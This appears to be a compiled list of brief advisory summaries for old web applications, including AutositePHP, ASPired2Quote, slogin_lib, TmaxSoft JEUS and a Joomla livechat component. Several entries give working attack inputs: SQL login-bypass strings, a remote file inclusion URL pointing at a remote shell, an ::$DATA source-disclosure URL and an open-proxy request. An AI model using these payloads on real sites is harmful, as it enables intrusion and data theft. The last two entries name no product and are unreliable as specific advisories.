AutositePHP v2.0.3 is vulnerable to Local File Inclusion, Cross Site Request Forgery and Edit File. An attacker can exploit these vulnerabilities to gain access to sensitive information, delete user accounts and modify files on the webserver.
A vulnerability in the Internal E-Mail System of http://asp-dev.com/main.asp?page=41 allows an attacker to bypass authentication by using the username ' or '1'='1 and the password ' or '1'='1. This vulnerability affects the http://asp-dev.com/message page.
ASPired2Quote is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
A vulnerability exists in the Discussion Web 4.0 web application, which allows an attacker to download the Microsoft Access Database file containing the application's data. This vulnerability is due to the fact that the application does not properly restrict access to the database file. An attacker can exploit this vulnerability by directly requesting the database file from the web server.
If $slogin_path is not given, becomes a null variable. Scrolling down the source code, you can see an include of that variable everywhere. Just one of the few vulnerable includes is include_once ($slogin_path . "header.inc.php");. The header.inc.php file, such as all the files of this cms, is in the same dir of slogin_lib.inc.php, so a fix could be just to include the file, without including a variable, which should be null becouse all the files are in the same dir. Exploit: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell] and /[path]/users.txt
Bugged file is: /[path]/admin/usercheck.php. Go to /[path]/admin/index.php and put as username and password the following sql code: ' or '1=1. You are the admin now, bypass succesfull =)
On NTFS TmaxSoft JEUS, which is an famous web application server, contained a vulnerability that allows an attacker to obtain web application source files. This was caused by ADSs(Alternate Data Streams; ::$DATA). JEUS couldn't handle ::$DATA. So it treated test.jsp::$DATA as an normal file when it requested. This is similar to the past MS Windows IIS vulnerability(Bid 0149). The attacker can obtain them easily using an URL request. http://www.target.com/foo/bar.jsp::$DATA
administrator/components/com_livechat/getChat.php && administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last' and administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com sends HTTP_FORWARDED
A buffer overflow vulnerability exists in the application due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the application, which can cause the application to crash or allow the attacker to execute arbitrary code in the context of the application.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. The malicious SQL statement can be used to extract sensitive information from the database, such as usernames and passwords.
Services By CQR